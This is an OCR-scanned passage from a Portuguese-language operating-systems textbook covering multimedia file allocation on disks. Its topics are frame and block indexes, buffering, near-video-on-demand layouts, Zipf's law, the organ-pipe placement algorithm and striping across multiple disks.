Depois de mais seis minutos terem se passado, o buffer 
esta preenchido e o ponto de exibięao encontra-se em 22 
minutos. O ponto de exibięao nao esta na meiade do buffer, 
embora csse problema possa ser rcsolvido, sc licccssario. 


7.7 


Alocaęao de arquivos em 
discos 


Os arquivos muhimidia sao bastante grandes e, com 
frequencia, sao escritos somente unia vez, mas lidos mui- 
tas vezes e, em geral, sao acessados sequencialmente. Suas 
reproduęóes devem cumprir criterios estritos de ąualidade 
de servięo. Jurnas, essas exigencias sugerem esquemas de 
sistemas de arquivos diferentes dos usados pelos sistemas 
operacionais tra di clona is. Discutiremos alguns desses as- 
suntos a seguir, partindo do contexto dc um linico disco e, 
entao, dc multiplos discos. 


7,7.1 I Alocaęao de um arquivo em um 
unico disco 

A exigencia mais importante c que os dados, na forma 
de fluxos, possani lluir para a rede ou para um dispositi- 
vo de safda, na veloddade necessaria e sem jitter. Por isso, 
ter vańas buscas em disco durante a leitura de um qua- 
dro e altanie nie indesejavd, Um modo de eliminar buscas 
imra-arqmvos em servidores de vfdeo e usar arquivos eon- 
tfguos. Normalmente, arquivos contiguos nao Funcionam 
bem, mas cm sci vidorcs dc vfdco, quc sao cuidadosamente 
carregados antecipadamente com filmes que nao mudarao 
mais, isso pode funcionar. 

No emanto, unia complicaęao e a presenęa de vfdeo, 
audio e texto, eon formę mostra a Figura 7,2* Mcsmo quc 
esses ciernemos estejam armazenados separadamentc 
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Ponto de exlbięao em 16 minutos 


(Ci) 


Ponto de eaibięao em 22 minutos 


(e) 


I Figura 7.17 [a) Situaęao iniciaL (b) Depois de retroceder 1 2 minutos. (c) Depois de esperar 3 minutos. (d) Depois de recomeęar a 
preencher o buffer. (e) Com o buffer cheio. 
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em arquivos comfguos, sera necessaria u ma busca para ir 
do arquivo cle video para um arquivo de audio e de la para 
um arquivo de texto, se este ultimo for necessario. Isso su- 
gere um segundo arranjo possfrel, com o vfdeo, o audio e 
o tcxto imcrcalados conformc mostra a Figura 7.18, mas 
todo o arquivo ainda c contiguo. Na figura, o vfdeo para 
o ąuadro 1 ć scguido dirctamente pdas divcrsas trilhas dc 
audio do ąuadro 1 c, en tao, pdas varias trilhas de tcxto do 
ąuadro 1. Dependendo de ąuaotas trilhas de audio e texto 
houver, podera ser mais simples apenas ler todas as part es 
de cada quadro em urna unica operaęao de leiiura de disco 
e transmitir somente as partes de que o usuario precisa. 

Essa organizaęao reąuer urna E/S adirioiial dc disco 
para lei tura dc audio c texto quc nao sejam desejados c 
um espaęo extra dc buffer em memória para armazena- 
-los. Conuido, eU dimina todas as buscas {em unt sistema 
monousuario) e nao reąuer custo extra para saber em que 
Ili gar no disco deierminado ąuadro esta localizado, pois 
todo o filrne e um arquivo contfguo. O acesso aleatório e 
impossfvel com esse esąuema, mas, como ele nao e neces¬ 
sario, sua perda nao e grave. Da mesma maneira, o 'avanco 
rapido' c o 'retrocesso rapido' tornam-se impossweis sem o 
acrescimo dc estru turas dc dados e complcxidade. 

A vaniagem de um filme imeiro como um unito arąui- 
vo contfguo e perdida em um seiridor de vfdeo com varios 
fiuxos concorremes de salda, pois, depois de ler um quadro 
de um filrne, os quadros de muitos outros filmes terao de 
ser Hdos antes de o primeiro ser lido novamenie. Alem dis- 
so, e difiril — e nada Ml — implementar um sistema em 
que os filmes estejam sendo escritos c lidos (por excmplo. 
Lim sistema nsado para produęao ou cdięao dc vfdeo) usali¬ 
do enormes arquivos contfguos, 

_ 7-7.2 I Duas estrategias altemativas de 

organizaęao de arquivos 

Essas observaęoes levam a duas om ras organizaęoes de 
alocaęao de arquivos muliirmdia. A primeka dessas orga- 
nizaęoes, o modelo de bloco peąueno, e ilustrada na Figu¬ 
ra 7.19(a). Nela, o tamanho do bloco de disco c conside- 
raveimenie menor que o tamanho medio de um quadro, 
mesmo para ąuadros P e ąuadros B. Para o MPEG-2 em 
4 Mbps com 30 ąuadrosM o tamanho medio do ąuadro 
e de 16 KB; portamo, um bom tanianlio dc bloco seria dc 
I KB ou 2 KB. A ideia c ter urna estrutura dc dados — o 


fndice de quadros — por filrne coin urna emrada para cada 
ąuadro apontando para sen initio. Cada quadro e consti- 
tufdo de todas as trilhas de vfdco, audio e texto daquele 
ąuadro, dispostas em blocos dc discos comfguos, conforme 
ilustrado* Dessa maneira, a Id tura de k ąuadros consistc em 
cncontrar a fc-esima cntiada no fndice dc ąuadros c, entao, 
ler o ąuadro imeiro em urna operaęao dc disco. Como dife- 
rcnles ąuadros tern tamanhos difcrenlcs, e necessario quc 
o tamanho do ąuadro (em blocos) esteja no fndice, mas, 
mesmo que os blocos de disco fossem de 1 KB, um campo 
de 8 bits conseguiria iratar um ąuadro de ate 255 KB, que 
e o suficiente para um ąuadro NTSC sem compressao e ate 
mesmo com rnuiias trilhas de audio. 

Omra maneira de armazenar o fil mc e usar um bloco 
de disco grandę (por exemplo, 256 KB) e colocar varios 
ąuadros em cada bloco, conforme iiustra a Figura 7.19(b). 
Ainda e necessario urn fndice, mas agora trata se de um 
fndice dc blocos c na.o dc um fndice de ąuadros. 0 mdi- 
cc c, na verdadc, basicamente o mesmo i-node da Figura 
6J4, possivdmente com o acrescimo dc uma informaęao 
indicando ąual ąuadro esta no infcio de cada bloco para 
tornar possfyel localizai rapidamente um ąuadro especifi- 
co. Em gcral, um bloco nao eon tera um nu mero inteiro dc 
ąuadros; portamo, algo deve ser feito para Udar com esse 
problema. Existem duas op0es. 

Na primcira opęao, ąuc i ii ust rada na Figura 7.19(h), 
se o próximo ąuadro nao couber no bloco a mai, deixa-se o 
restanie do bloco vazio. o espaęo desperdięado e a fragmen- 
taąao interna, a mesma dos sistemas de memória viriual 
com paginas de tamanho fixo. Por outro lado, nunca sera 
necessario fazer urna busca no meto de um ąuadro. 

A outra opęao e preencher cada bloco ate o finał, di- 
vidindo-se os ąuadros entre os blocos. Essa opęao gera a 
necessidade de buscas no mdo dos ąuadros, o ąue pode 
prejudicar odesempenho, mas economiza espaęo em disco, 
eliminandoa fragmentaęao interna. 

Para fins de comparaęao, o uso de peąuenos blocos na 
Figura 7.19(a) tambem desperdięa algum espaęo em disco, 
pois uma fraęao do ultimo bioco em cada ąuadro nao e 
usada. Para um bloco dc disco de 1 KB e um filrne NTSC 
de duas horas forma do por 216 mil ąuadros, o espaęo em 
disco desperdięado sera por volta de 108 KB em 3,6 GB. 
Para o caso da Figura 7,19(b), o espaęo desperdięado e mais 
dificil de ser calculado, mas devera ser mtiito maior pois, de 
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Figura 7.18 Intercalaęao de yfdeo, audio e texto em um unico arquivo contlnuo por filrne. 
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Indice do Indice de 

quadro blocos 




I Figura 7.19 Armazenamento nao contiguo do filme. (a) Sfocos da disco peąLienos. (b) Blocos de disco grandes. 


tempos em tempos, havera 100 KB abandonados no finał 
dc um bloco cujo próximo quadro sera um quadro I maior 
quc o cspaęo no finał desse bloco. 

Por outro lado, o indice de blocos e muilo mcnor quc 
o indice de ąuadros. Em um bloco de 256 KB e um ąuadro 
media de 16 KB, cabem cerca de 16 quadros em um bloco; 
assim, um filme de 216 mil ąuadros predsa somente de 
13.500 emradas no indice de blocos, contra as 216 mil ne- 
ccssarias no indice de ąnadros. Por mo!ivo dc desempenho, 
cm ambos os ca sos o indice deve relacionar todos os qua- 
dros on blocos (isto e, scm blocos indiretos como no UNIX), 
Ugando 13.500 emradas de 8 bytes em mcmória {4 byies 
para endcreęo de disco, I byle para o tamanho do quadro e 
3 bytes para o mimero do quadro inicial) wrsus 216 mil en- 
tradas de 5 bytes (somente endereęo de disco e tamanho), 
o que economiza quase 1 MB de RAM enąuanto o filme 
estiver sendo reproduzido. 

Essas consideraęóes acarretam os seguintes eompro- 
misśps: 

1. Indice dc quadros: Uso mais intciisivo da RAM cn- 
ąuanlo o filme e rep rodu zido; pequena perda de 
disco. 

2. Indice de blocos (scm dividir os ąuadros entre os blo¬ 
cos): Pcąueno uso dc RAM: grandę perda de disco. 

3. Indice dc blocos (dmdindo os ąuadros entre os blo¬ 
cos): Peąueno uso dc RAM; n en hu ma perda dc dis¬ 
co; buscas extras. 

Portanto, os compromissos envolvcm o uso de RAM 
durante a reproduęao, perda dc cspaęo em disco a quai- 
quer momento e dc desempenho durante a reproduęao 
por causa de buscas adicionais, Esses problemas podcm 
ser solucionados de varias maneiras. O uso de RAM pode ser 
red u zido pela paginaęao em partes da tabela de ąuadros no 


momento correto. As buscas durante a transmissao de ąua¬ 
dros podem ser mascaradas por u ni bu ffer adeąuado, mas 
isso gera a neeessidade dc mais mcmória e, provavdmemc, 
de mais cópias. Um bom projeto deve analisar cuidadosa- 
mente lodos esses fatores e fazer urna boa escolha conside- 
rando a aplicaęao. 

Alcm disso, outro fator e que o ge ren ci a men to do 
armazenamento em disco e mais complicado na situaęao 
ilustrada na Figura 7.19(a), poiso armazenamento de um 
quadro reąucr que se en contrę urna sequ.cn da tonsecu- 
tiva dc blocos dc tamanho corrcto, Idcalmcntc, essa seąucn- 
cia dc blocos nunca dcvc ultrapassar o limitc da tri Ilia do 
disco, mas, ajustando kead skew, a perda desse tempo nao 
e grave. Contudo, deve-se evitar ultrapassar o limitc do 
cdindro. Essas exigencia$ significam que o armazenamen¬ 
to em disco que nao esta sendo usado deve ser ofganizado 
como urna lista dc espaęos vazios dc tamanho variavd, e 
nao urna lista simples de blocos ou um mapa dc bits r que 
podem, ambos, ser usados na Figura 7.19(b). 

Em todos os casos, ha muilas estratćgias para colocar 
todos os blocos ou ąuadros dc urn filme em um peąueno 
espaęo — por exemplo, em alguns eilindros, ornie for pos- 
sweb Essas alocaęóes destinam-se a deixar as buscas mais 
rapidas para que tesle mais tempo para oulras atividades 
(que nao sejam dc tempo rcal) ou para dar suportc a f!uxos 
de vfdeo adicionais. Unia alocaęao restrita como essa pode 
ser realizada pela divisao do disco em grupos de eilindros e 
mantendo, para cada grupo, listas ou mapas tle bits sępa- 
rados dc blocos quc nao estejam cm uso, Se, por excmplo, 
listas de regioes vazias fossem usadas, haveria unia lista dc 
regioes vazias dc 1 KB. unia para regioes vazias dc 2 KB, 
omra para regioes vazias de 3 a 4 KB, unia outra para regioes 
vazias de 5 a 8 KB, e assim por dianie. Desse modo, e faril 
cncomrar u ma regiao vazia de um certo tamanho em um 
grupo cspccffico dc eilindros. 
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Otttra diferenęa ciurę essas duas soluęoes e o buffer. 
Para o caso de blocos peąuenos, cada łeitura obtem exa- 
tamente urn quadro. Conseąuente mente, unia estrategia 
que simplesmeme dupliąue o buffer fundona bem: um 
bnffcr para rcproduzir o ąuadro a mai c outro para buscar 
o seguinte, Sc forcin usados buffcrs predetcrminados, ca da 
buffer dcvera ter tamanho sufkiente para o maior ąuadro I 
possfvd, Por outro lado, se um buffer diferente for alocado 
de um conjunto de buffcrs para cada ąuadro e o tamanho 
do ąuadro for eonhecido a mes de o ąuadro ser lido, pode- 
-se especificar um peąueno buffer para um ąuadro P ou 
para um ąuadro B. 

Para blocos gran des, e necessaria uma estrategia inais 
complexa, pois cada bloco cantem varios ąuadros, possivd- 
mente induindo fragmentos dos ąuadros cm cada finał dc 
bloco (dependendo de ąual opęao fol escolbida), Sc exibir 
ou iransmitir ąuadros reąuerąue eles sejatn comiguos, des 
deverao ser copiados, mas copiar e urna operaęao cara e, 
portanto, deve ser evitada ąuando possivel. Se a contigui- 
dade nao for necessaria, entao os ąuadros que passarem 
dos limites do bloco poderao ser enviados pela rede ou para 
o dispositivo de exibięao cm duas partes. 

O buffer duplo tambem pode ser usado com blocos 
grandem mas empregar dois blocos grandes desperdięa 
memória. Um modo de driblar essa perda de memória e 
implementar um buffer de transmissao drcular um po u co 
maior ąue um bloco de disco (por Huxo) e que alimente a 
rede ou o dispositivo de exibięao. Quando o conteudo do 
buffer fica abaixo de algum Umiar, um novo bloco gran¬ 
dę e lido do disco, o conteudo e copiado para o buffer de 
transmissao c o buffer do bloco grandę ret orna para o local 
comum dc buffcrs, 0 tamanho do buffer drcular devc ser 
determinado dc tal maneira ąue, uma vez atingido o li miar, 
baja Uigar para outro bloco de disco preenchido, A leitu- 
ra do disco nao pode enviar diretamente para o buffer de 
transmissao, pois, nesse caso, poderia ocorrer a sobreposi- 
ęao drcular Ha um compromisso entre o uso da memória 
e a operaęao de cópła. 

Outro fator na comparaęao dessas duas estrategias ć o 
desempenho do disco, Usar grandes blocos permile que 
o disco opere a loda a velocidade — muitas vezes essa e a 
Principal preocupaęao. A leitura de peąuenos ąuadros Pe 
ąuadros B como unidades sępa rada s nao e eficieme. Alem 
disso r e possfvel dividir grandes blocos em varias unidades 
de disco (isso e discutido a seguir), ao passo ąue diyidir 
ąuadros individuais em multiplas unidades de disco nao 
ć possfvel 

A orgamzaęao em peąuenos blocos da Figura 7.19(a) 
algumas vezes e chamada de tamanho de tempo cons- 
tante porąue cada pontelro no fndice represenla o mesmo 
mi mero de miiissegundos do tempo de reproduęao, Por 
outro lado, a organizaęao da Figura 7.19(b) algumas vezes 
e chamada de tamanho de dados constante, pois os blo¬ 
cos dc dados sao do mesmo tamanho. 


Outra diferenęa entre as duas organizaęóes de arquivos 
e ąue, se os tipos de ąuadros forem armazenados no fndi¬ 
ce da Figura 7.19(a), torna-se possivei realizar um avanęo 
rapido mostrando apenas os ąuadros I. Contudo, depen- 
dendo do numero de vczes que os ąuadros i apareęam no 
fluxo, percebe-sc uma taxa mutto mais rapida ou muito 
mais lenta. De ąualąuer maneira, para a organizaęao da 
Figura 7.19fb), o avanęo rapido nao e po$sfvel. De falo, 
ler seąuenęialmente o arquivo para ter acesso aos ąuadros 
desejados reąuer uma imensa E/S de disco. 

Uma śegunda safda para a ąuestao c usar um arquivo 
especial ąue, ąuando reproduzido em vdocidade norma!, 
de a ilusao de estar em avanęo rapido de dez vezes, Esse ar- 
qihvo pode ser estru m rado como outros arquivos, usando 
um fndice de quadros ou um fndice de blocos. Ao abrir um 
arquivo, o slstema deve ser capaz de encontrar o arquivo 
de avanęo rapido, ąuando necessaria Se o usuaiio dicar no 
bołao de avanęo rapido, o sistema devera encontrar c abrir 
o arquivo dc avanęo rapido insiantancamente e, entao, 
desviar para o local correto do arquivo, O sistema sabe ąual 
o nirmero do ąuadro cm que ele estn, maspredsa ser capaz 
de iocalizar o ąuadro correspondente no arquivo de avanęo 
rapido. Se, por exemplo, ele estiver no ąuadro 4.S16 e se 
o sistema souber quc o arquivo de avanęo rapido e de dez 
vezes, entao o sistema dcvc Iocalizar o ąuadro 482 daąuele 
arąuivo c comcęar a rcproduzir a parlir desse ąuadro. 

Sc for einpregado um mdicc dc ąuadros, sera facil lo- 
calizar um ąuadro espedfico; e só um fndice no fndice de 
ąuadros, Sc for usado um fndice de blocos, sera ne ces sari o 
acresccntar uma informaęao cm cada entrada para identi- 
ficar ąual ąuadro esta cm cada bloco c dcvc ser realizada 
uma busca binaria no fndice dc blocos. O rctroccsso rapido 
funciona de maneira analoga ao avanęo rapido. 

7-7-3 I Alocaęao de arquivos para video 
quase sob demanda 

Ate agora, temos estudado csiraiegias de alocaęao para 
vfdeo sob demanda. Para vfdco ąuasc sob demanda, ha 
uma estrategia diferente dc alocaęao quc c mais eficieme, 
Lembrc-se dc ąue o mesmo fi lnic esta saindo em fluxos 
de varios estagios. Mesmo ąue um iilmc seja armazenado 
como um arquivo comfguo, e necessario buscar cada lluxo. 
Chen c Tliapar (1997) invenlaram uma estrategia cle alo¬ 
caęao de arquivos para eliminar ąuase todas as buscas. Stia 
aplicaęao e ilustrada na Figura 7.20, para um filme sendo 
reproduzido em 30 quadros/s com um novo lluxo se ini- 
ciando a cada cinco minutos (como na Figura 7.16). Com 
esses parametros, sao necessarios 24 fluxos concorrcmcs 
para um filme de duas horas. 

Nessa alocaęao, conjuntos de 24 ąuadros sao conca- 
tenados e escritos no disco como um unico registro, Eles 
tambćm pod oni ser lidos em uma só operaęao de leitura, 
Considcre o instante em ąue o fluxo 24 tenha a ca ba do de 
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comeęar. O ąuadro 0 sera necessario. O fluxo 23, que co- 
meęou cinco miniitos antes, predsara do ąuadro 9.000. O 
fluxo 22 predsara do ąuadro 18.000 e assim por diante ate 
o fliixo 0, qne predsara do quadro 207.000. Dispondo esses 
ąuadros conseentivamenie cm u ma trillia dc disco, o ser- 
vidor pode satisfazer todos os 24 fluxos cm ordcm inversa 
somente com urna busca (para o quadro 0). E claro que os 
quadros podcm estar cm ordcm inversa no disco sc houver 
algum motivo para serw os fluxos cm ordcm ascendenie, 
Depois de semr o ultimo fluxo, o braęo do disco pode mo- 
ver-se para a trilha 2 e prepaiar todo o servięo novameme. 
Esse esąuema nao exige que todo o arquivo seja contiguo, 
mas ainda permite um bom desempenha para varios fluxos 
simultaneos. 

Unia estrategia simples ąuanto ao buffer e usar buffer 
duplo. Enąuamo um buffer csiiver sendo reproduzido so- 
bre os 24 fluxos J ouiro buffer estara sendo amecipadamen- 
te carregado. Quando o buffer atual termina, os dois buffers 
sao irocados e o que esiava empregado na reproduęao pas¬ 
sa a ser carregado cm urna tinica operaęao de disco. 

Urna ąuestao interessantc e quaJ dcvc ser o tamanho 
do buffer* Obviamcntc, o buffer dcvera ser capaz cle contcr 
os 24 ąuadros, Contudo, como os ąuadros sao de tamanho 
variavel nao e simples escolher o tamanho correio do buffer. 
Um buffer capaz de contcr 24 ąuadros I e o mesmo que 
usar um canhao para matar uma mosca, mas escollier um 
tamanho sufidente para 24 ąuadros medios e gostar de vi- 
ver perigosameme. 

Fdizmente, para qualquer filmc, a major trilha (no 
sentido da Figura 7.20) do fil me e conhccida de antemao; 
portanto, pode-sc escolher um buffer exatameme desse m- 
manlio. Gontu do, e possivel que na mator trilha haja, por 
exemplo, i6 ąuadros I e que na segimda maior trilha baja 
apenas nove ąuadros L Uma derisao para escolher um buffer 
grandę o bastante para conter o segundo maior caso pode 
ser a mais sabia. Fazer essa escollia significa truncar a maior 
trilha e, assim, impedir que alguns iluxos dc um quadro do 
filmc sejam cxibidos. Para evitar uma la]ha na exibięao, o 


ąuadro amerior pode ser i nosi rad o nova menie. Ninguem 
perce bera isso. 

Levando adiantc essa cstratćgia, sc a teredra maior tri- 
Ilia iiver somcnie ąuatro ąuadros h usar um buffer capaz 
de conter ąuatro ąuadros I e 20 ąuadros P e rnelhor ainda. 
introduzir dois ąuadros repetidos para alguns fluxos no fil- 
me pode ser aeeitavel. E onde isso termina? Provavelmente 
com um tamanho de buffer grandę o sufidente para 99 por 
cen to cios ąuadros* Evidenicmcnie, ha um compromisso 
entre a memória osada para os buffers e a ąualidade dos 
fil mes cxibidos. Kole quc, ąuanto mais f 1 u xos simultaneos 
houvtx mdhores scrao as cstatLsticas e mais uniformes sc 
mostraraó os conjuntos dc ąuadros. 

7JA I Alocaęao de multiplos arquivos em 
um unico disco 

Ate agora, estudamos somente a alocaęao de um thiico 
filmc. Em um servidor de vfdeo havera muito mais filmcs, 
e claro. Se esliverem dispersos alealoriamente polo disco, 
sera necessario muito tempo para movimeniar o cabeęote 
do disco dc um filmc para outro ąuando varios fil mes es- 
tiverem sendo vistos siirmliancamcnte por diferentes con- 
sumidores* 

Essa situaęao pode ser melhorada observando-se que 
alguns fil mes sao mais populares que outros e levando a 
popularidade cm consideraęao na alocaęao de fil mes no 
disco. Embora pouco possa ser dito sobre a popularidade 
de algum filmc em particular (observar se o elcnco e for¬ 
ma do por grand es estrelas pode aj u dar), emgeral e possivd 
estabelecer de modo aproximado a popularidade relativa 
dos filmes. 

Para diver$os criterios de popularidade — como ąuais 
(iimes sao mais alugados, quc livros sao mais empresta- 
dos em uma biblioteca, ąuais as paginas da Web que estao 
sendo mais visitadas, ate mesmo as pakvras de um dado 
idioma que estao sendo mais usadas em um romance on 
pda popula^ao das maiores cidades —, uma aproximaęao 


Ordem na qua! os blocos sao lidos do disco 
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I Figura 7.20 Alocaęao ótima de ąuadros para video quase sob demanda. 
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razoavel da popularidade relaiiva vem de um padrao sur- 
preendentemente previsfvel. Esse padrao fol descoberto 
por um professor de lingufsrica de Harvard, Ceorge Zipf 
{1902-1950) e agora e conbecido como lei de Zipf, O que 
cssa lei estabelece e quc sc fil mes, Iivros, paginas da Web 
ou palavras sao classifkados cm funęao dc su a popularida- 
de, a probabilidade dc quc o próximo consumidor cscolha 
o ilcm dassificado cm A-esimo lugar na lista e C/k para a 
qual C e urna consianie de normalizaęao. 

Portanto, as fraęóes de acerto para os tres primeiros 
filmes sao respectivamente CI 1, C/2 e C/3, para as quais C 
c calculado de modo quc a soma de todos os termos seja 1. 
Em outras pahwras, sc houvcr N filmes, entao 

C/1 + C/2 + C/3 + C/4 + ... + C/N = 1 

A partir dessa equaęao pode-se calcular C Os vaio- 
res de C para as populaęoes com dez, cem f mil e dez mil 
itens sao 0,341, 0,193, OJ 34 e 0,102, respectiva menie. Por 
exemplo, para mil filmes, as probabilidades dos cinco pri¬ 
meiros filmes sao, respectivamente, 0,134, 0,067, 0,045, 
0,034 c 0,027, 

A Id dc Zipf e ilustrada na Figura 7,21, Só por divmao, 
ela foi apiicada as populaęoes das 20 maiores ddades dos 
Estados Uoidos. A lei dc Zipf preve que □ segunda maior ci- 
dade tem metadc da populaęao da maior cidade c a tcrccira 
maior dcveria ter um teręo da populaęao da maior cidade, 
e assim por dianie, Embora cssa previsao difidlmcnte seja 
cxata, ela ofercce u ma incrfvcl aproximaęao. 

Para os filmes dc um servidor de vfdco, a lei dc Zipf 
cstabclcce quc o filme mais popular e escolhido duas vczcs 
mais quc o segundo filme mais popular, tres vczcs mais que 
o terceim filme mais popular, e assim por dianie, Embora 


a distribuięao cala basta me rapido no imcio, ela tem uma 
longa cauda. Por exemplo, o filme 50 tem uma populari¬ 
dade de C/50 e o filme 51 tem uma popularidade de C/51 
e, portamo, o filme 51 e 50/51 vczes menos popular que o 
filme 50 — uma diferenęa dc ccrca de 2 por cen to, Confor- 
mc sc pcrcorrc a cauda do grafico, a difcrenęa pcrccmual 
entre os filmes eonsecutivos torna-se cada vcz mcnor + Uma 
conclusao e que o sewidor prccisa dc inuitos filmes, ja quc 
ha uma demanda significatiya para os filmes que nao estao 
entre os dez primeiros. 

Conhecer as popularidades rciatuas dc diversos fil¬ 
mes possibilita fazer um modclo de desempenho dc um 
senddor dc vidco c usar cssa informaęao para alocar os 
arquivos. Estudos tem mostiado que a md hor cstratćgia 
e surprcendcmementc simples e indcpendcnlc de uma 
distribuięao, £ o chama do algoritmo dos tubos de dr¬ 
gać {orgeuj-pipe algonthm) (Grossmau e Stlvennan, 1973; 
Wong, 19S3). Esse algoritmo constste em colocar o filme 
mais popular no meto do disco, com o segundo e o terceiro 
filmes mais populares em cada um dos lados do primeiro 
filme. Externameme a esses dois vem os mimeros ąuatro 
e cinco c assim por dianie, conforme mostra a Figura 7.22. 
Essa alocaęao funciona melhor se cada filme for um arqui- 
vo contiguo do lipo mostrado na Figura 7,18, mas tambem 
pode ser usada sc cada filme csiiver reslrito a um peąueno 
intervalo dc eilindros. O nome do algoritmo origina-se do 
falo de que um hisiograma das probabilidades se parece um 
pouco com um órgao assimetrico. 

O que o algoritmo faz e tentar manter o cabcęote no 
mcio do disco. Com mil filmes e uma distribuięao segun- 
do a lei dc Zipf, os cinco primeiros filmes representam uma 
probabilidade total de 0, 307, o quc significa quc a cabeęa 
d;i disco ficara nos eilindros alocados para os cinco primeiros 



Ordem por populaęao 


Figura 7.21 A curva da lei de Zipt para N = 20. Os quadrados representam as populaęoes das 20 maiores ddades dos Estados 
Unidos, classificadas pefa ordem de populaęao (Nova York eal, Los Angeles e a 2, Chicago e a 3 etc.). 
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Cii ind ro * 

I Figura 7 22 A distribuięao no fermato tubo de órgao para os arquivos em um servidor de video. 


fil mes aproximadameme 30 por cm to do tempo, lima quan- 
tidade consideravel se mil fil mes estiverem dispomveis. 

7,7-5 I Alocacao de arquivos em multiplos 
discos 

Para conseguir melhor desempenho, os servidores de 
yfdeo muitas vezes tem diversos discos que podem funcio- 
nar paraldamente, Ocasionalmente sao nsados Raids, mas 
muitas vczes nao, pois o quc RAIDS ofereccm e unia maior 
confiabilidadc a custa de desempenho. Senddores de yfdeo 
buscam, em geral alio desempenho e nao se preocupam 
muito em eorrigir erros transientes. Al cm disso, os contro- 
ladores RAID podem se transformar em um gargalo se hou- 
ver muitos discos para serem tratados simultaneameme. 

Uma configtiraęao mais co nu im e simplesmente ter 
um grandę ml mero de discos, algumas vezes chainados de 


disk farm. Os discos, diferentememe dos RAIDS, nao gi¬ 
ra m dc uma mancira sinerouizada nem dispócm dc bils dc 
paridade* Uma pos$ivel coniiguraęao e por o fiime A no 
disco L o fiime 8 no disco 2 e assim por dianie, conforme 
mostrado na Figura 7.23(a). Na prali ca, com os discos mo- 
demos, varios fil mes podem ser colocados em cada disco. 

Essa organizaęao e simples de implememar e apresema 
caracterfeiicas de falhas muito diretas: se um disco falhar, 
todos os filmes que estivercm nele fi cara o indispomveis< 
Notę que, se uma empresa perder um disco cheio de filmes, 
nao e lao mim quamo uma empresa perder um disco cheio 
dc da dos, pois os filmes podem ser fadlmcme re car r ega dos 
em um disco sobressaleme, a partir de um DVD. Uma des- 
yamagem desse metodo e que a carga pode se deseąuilibrar 
facilmeme. Se alguns discos contiverem filmes com muitas 
reąuisiędcs e outros comiverem filmes menos populares, o 
sistema tiunca sera plena nieme utilizado. E claro que, se as 
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Figura 7.23 Guairo rrtaneiras de organizar arquivos tnuitiruidia em multipEos discos. ta) Sem distribuięAo. (b) Distribuindo por partes 
I com um mesmo padrao para todos oś arquivos, (c) Distribitięao por partes com reyezamento. (d) Distribuięao aleatória. 
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freąuencias de uso dos filmes forem conhecidas, sera possf- 
vel mover alguns deles para eątiiłibrar a carga. 

Oma segunda organ izaęaó possivd sc bascia na distri- 
buięao de ca da filme em multiplos discos, como no exem- 
plo da Figura 7,2 3{b), que mostra u ma disiribuięao em 
ąuatro discos. Vamos presumir, para esses exemplos, que 
todos os ąuadros sao do mesmo tamanho (isio e, sem com- 
pressao). Urn certo nu mero de bytes do filme A e escrito no 
disco i, entao o mesmo mimero de bytes e escrito no disco 
2 e assim por dian te, ate o ultimo disco (nesse caso, a uni- 
dade A3). Depois disso, a distribuięao das partes continua 
novamente a partir do primeiro disco, com a imidadc A4, 
ate quc o arquivo intciro cstcja escrito* Nesse momento, os 
filmes B, C c D estao distdbufdos u san do o mesmo padrao* 

Urna possivd desvantagem desse pa dra o de distribui- 
ęao por partes e que, como todos os filmes comeęam no 
primeiro disco, a carga pode nao ser eąuilibrada. Um modo 
de distribuir melhor a carga e revezar os discos iniciais, 
como mostra a Figura 7.23(c). Giitra tentativa dc cquili¬ 
bra r a carga c usar, para cada arquivo, um padrao alcatório 
de distribuięao de su as partes, eon formę sc vc na Figura 
7,2 3 (d). 

Ate agora, supomós que todos os ąuadros sejam do 
mesmo tamanho. Para os filmes em MPEG-2 essa hipótese 
e falsa, pois os ąuadros I sao bem maiores que os ąuadros 
R Ha duas maneiras de Udar com essa complicaęao; distri¬ 
buir por ąuadros ou por blocos, Distribuindo por ąuadros, 
o primeiro ąuadro do filme A vai para o disco 1 como urna 
unidade contfgua, independememente de sen tamanho. 
O ąuadro seguinte vai para o disco 2 e assim sueessiva- 
meme. O filme B e disiribufdo de modo semelhante, ou 
i md and o no mesmo disco, ou no próximo (fazendo re- 
vezaniento), ou em um disco aleatório. Como os ąuadros 
sao lidos indiyidualmente, esse sistema de distribuięao por 
partes nao permite urna ieitura mais rapida de algum fil¬ 
me especffico. Contudo, de distribui a carga pelos discos 
muito melhor quc o mostra do na Figura 7.2 3 (a), que pode 
funcionar muito mai sc muitas pessoas decidirem assistir 
ao filme A a noitc c ninguem quiser assistir ao filme C* Em 
geral, a distribuięao da carga por todos os discos utiliza melhor 
a largura de banda total do disco e, assim, ineremema t> 
nu mero de consnmidores que podem ser servidos. 

Outro modo de distribuir e por blocos. Para cada fil¬ 
me, imidades de tamanho constante sao escritas succssiva- 
mente (ou aleatoriamente) em cada um dos discos. Cada 
bloco contem um ou mais ąuadros, ou fragmentos desses 
ąuadros. O sistema, entao, e capaz de emitir reąuisięoes 
para multiplos blocos de u ma só vez, para o mesmo fil¬ 
me. Cada reąuisięao pede para ler dados em um buffer de 
memória dilerem e, mas de maneira que, ąuando todas as 
reąuisięoes terminam, urna poręao contfgua do filme (con- 
tendo muitos ąuadros) esta agora montada contiguamente 
na memória. Essas reąuisięoes podem ocorrer em parale¬ 
lo. Quando a ultima reąuisięao for atendida, o processo 


reąuerente pode ser avisado de que o trabalho terminom 
Ele esta, entao, apto a comeęar a transmitir os dados para 
o usuario. Varios ąuadros depois, ąuando o buffer estiver 
ąuase vazio, com os ultimos ąuadros, mais reąuisięoes 
sao emitidas para carrcgar antę cipa da mente outro buffer. 
Essa tatica emprega grandes ąuantidades dc memória para 
o buffer para manier os discos ocupados. Em um sistema 
com mil usuarios ativos c buffers de i MB (por exemplo, 
usamlo blocos de 256 KB em cada um dos ąuatro discos), 
e necessario l GB de RAM para os buffers. Isso representa 
muito pouco em um servidor de mil usuarios e nao deve 
ser um probiema. 

Um tópico finał sobrc a distribuięao por partes c por 
qualiios discos o filme dcve estar distribuido. Em um cxirc- 
mo, cada filme poderia estar dislribmdo por todos os discos* 
Por excmplo, para filmes dc 2 GB e mil discos, poderia ser 
escrito um bloco de 2 MB em cada disco e, dessa maneira, 
nenii um filme usaria o mesmo disco duas vezes. No ou¬ 
tro extremo, os discos seriam particionados em peąuenos 
grupos (como na Figura 7.23) e cada filme ficaria restrito 
a uma tinica partięao. O primeiro caso, a cha mada distri¬ 
buięao ampla, eąuiiibra bem a carga entre os discos. Sen 
Principal probiema e quc, sc todo filme usar todos os dis¬ 
cos e um disco parar dc funcionar, ncnhiim filme podera 
ser cxibido, O segundo caso, a distribuięao restrita, pode 
sofrer com a popularidade de um filme (ou dc algumas par- 
